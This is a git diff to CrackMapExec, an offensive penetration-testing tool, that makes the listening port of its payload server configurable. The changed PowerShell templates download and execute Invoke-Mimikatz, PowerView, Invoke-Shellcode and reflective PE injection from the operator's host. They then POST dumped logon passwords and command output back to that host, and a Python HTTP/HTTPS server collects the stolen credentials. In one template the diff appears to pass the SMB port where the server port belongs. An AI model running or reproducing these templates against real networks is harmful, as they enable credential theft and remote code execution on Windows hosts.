diff --git a/core/powershell.py b/core/powershell.py index 976eeb86..21c823cc 100644 --- a/core/powershell.py +++ b/core/powershell.py @@ -32,9 +32,9 @@ class PowerShell: def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1'); $creds = Invoke-{func_name} -Command '{katz_command}'; - $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/'); + $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds); @@ -42,8 +42,9 @@ class PowerShell: $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); - $request.GetResponse();""".format(protocol=self.protocol, - func_name=self.func_name, + $request.GetResponse();""".format(protocol=self.protocol, + port=settings.args.server_port, + func_name=self.func_name, addr=self.localip, katz_command=command) @@ -52,9 +53,9 @@ class PowerShell: def powerview(self, command): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1'); $output = {view_command} | Out-String; - $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/'); + $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($output); @@ -62,7 +63,8 @@ class PowerShell: $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); - $request.GetResponse();""".format(protocol=self.protocol, + $request.GetResponse();""".format(protocol=self.protocol, + port=settings.args.port, addr=self.localip, view_command=command) @@ -70,12 +72,13 @@ class PowerShell: def inject_meterpreter(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1'); - Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol, + IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1'); + Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol, + settings.args.server_port, self.localip, self.func_name, - settings.args.inject[4:], - settings.args.met_options[0], + settings.args.inject[4:], + settings.args.met_options[0], settings.args.met_options[1]) if settings.args.procid: command += " -ProcessID {}".format(settings.args.procid) @@ -86,10 +89,11 @@ class PowerShell: def inject_shellcode(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1'); $WebClient = New-Object System.Net.WebClient; - [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}'); + [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}'); Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol, + port=settings.args.server_port, func_name=self.func_name, addr=self.localip, shellcode=settings.args.path.split('/')[-1]) @@ -103,11 +107,12 @@ class PowerShell: def inject_exe_dll(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1'); - Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol, - func_name=self.func_name, - addr=self.localip, - pefile=settings.args.path.split('/')[-1]) + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1'); + Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol, + port=settings.args.server_port, + func_name=self.func_name, + addr=self.localip, + pefile=settings.args.path.split('/')[-1]) if settings.args.procid: command += " -ProcID {}" diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py index 3d5c179d..09d29825 100644 --- a/core/servers/mimikatz.py +++ b/core/servers/mimikatz.py @@ -89,14 +89,14 @@ class MimikatzServer(BaseHTTPRequestHandler): for line in buf: print_att(line.strip()) -def http_server(): - http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer) +def http_server(port): + http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer) t = Thread(name='http_server', target=http_server.serve_forever) t.setDaemon(True) t.start() -def https_server(): - https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer) +def https_server(port): + https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer) https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True) t = Thread(name='https_server', target=https_server.serve_forever) t.setDaemon(True) diff --git a/crackmapexec.py b/crackmapexec.py index 5945ce93..f8bc6a24 100755 --- a/crackmapexec.py +++ b/crackmapexec.py @@ -72,7 +72,7 @@ parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Spe parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters') parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)") parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)') -#parser.add_argument("--server-port", type=int, help='Start the server on the specified port') +parser.add_argument("--server-port", type=int, help='Start the server on the specified port') #How much fail can we limit? can we fail at failing to limit? da da da dum parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)') @@ -150,6 +150,18 @@ args.target = args.target[0] patterns = [] targets = [] +if args.server == 'http': + if args.server_port: + args.http_port = args.server_port + else: + args.server_port = 80 + +if args.server == 'https': + if args.server_port: + args.https_port = args.server_port + else: + args.server_port = 443 + init_args(args) if args.verbose: @@ -245,10 +257,10 @@ else: if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja': if args.server == 'http': - http_server() + http_server(args.server_port) elif args.server == 'https': - https_server() + https_server(args.server_port) def concurrency(targets): '''